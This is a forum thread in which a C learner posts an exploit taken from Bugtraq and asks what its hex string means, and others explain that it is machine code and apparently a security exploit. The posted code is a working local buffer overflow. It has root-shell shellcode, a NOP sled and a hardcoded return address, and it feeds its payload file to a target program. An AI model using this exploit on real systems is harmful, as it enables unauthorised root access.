hi
here's a part of a c source code i took from bugtraq mailing list....i'm currently learning C...so i'd like to ask a few things.... really2 hope u guys and gals out there can help me :)

#include <stdio.h>

/* kode ripped from kon2.c */

char codez[] =
/* setuid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\xcd\x80" /* int $0x80 */
/* setgid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\xcd\x80" /* int $0x80 */
/* /bin/sh execve(); */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80" /* int $0x80 */
/* exit(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x01" /* mov $0x01,%al */
"\xcd\x80"; /* int $0x80 */

#define NOP 0x90
#define LEN 289
#define RET 0xbffff314 //Mandrake 9.1 offset

int main(int argc, char *argv[]) {

char buffer[LEN];
long retaddr, offset;
int i;
FILE *fp;

offset = 0;
if (argc > 1) {
offset = atol(argv[1]);
}
retaddr = RET + offset;

printf("\n Modified by j0e! Original code from:");
printf("\n- (c) teleh0r@doglover.com anno 2000 -\n");
printf("Use : %s [offset] \n", argv[0]);
printf("Using: address 0x%lx\n\n", retaddr);

for (i = 0; i < LEN; i += 4)
*(long *) &buffer[i] = retaddr;
/*The greater the NUM of strlen(codez) - NUM, the more return addresses
are
* put at the end (and less NOPS in the beggining*/
for (i = 0; i < (LEN - strlen(codez)-40); ++i)
*(buffer + i) = NOP;

memcpy(buffer + i, codez, (strlen(codez)));
fp = fopen("bigbuff", "w");
fprintf(fp, "%s",buffer);
fclose(fp);
execl("./securecode", "securecode","-s","bigbuff", 0);

return 0;
}

what's all this things for ?

char codez[] =
/* setuid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\xcd\x80" /* int $0x80 */
/* setgid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\xcd\x80" /* int $0x80 */
/* /bin/sh execve(); */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80" /* int $0x80 */
/* exit(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x01" /* mov $0x01,%al */
"\xcd\x80";

please explain to me.. in brief and detail what are those x89/xd8 bla bla things all about...
cause i don't think i could find these things in any C books :confused:

thanx a lot

It looks like an array of Assembly directives.

:confused:

can u please explain further?

Assembly language is a human-readable notation for the low-level instructions that are executed by the processor. Basically, the array at the beginning of the program is machine language, but it is being treated as an array.

The rest of the code is a program to write this data into a file, and execute a program called "securecode" using this file as an argument.

Edit: This actually looks like some sort of security exploit to me. This isn't exactly the sort of thing I'd recommend to someone just learning C...

ooooo

actually i'm not really just started learning C.... nearly 2 years already...:D ..i can now program in C,C++,visual basic and java.... but every time i see that kind of code.... i got confused... never recall learning anything like that ...and my curiosity arise..:p . hmm...thanx a lot... btw can u tell me where can i learn more about those things?

Main documentation page

http://hybd.net/~mms/nasm/docs/nasmdoc0.html

thanx a lot... that will surely explain a lot :cool: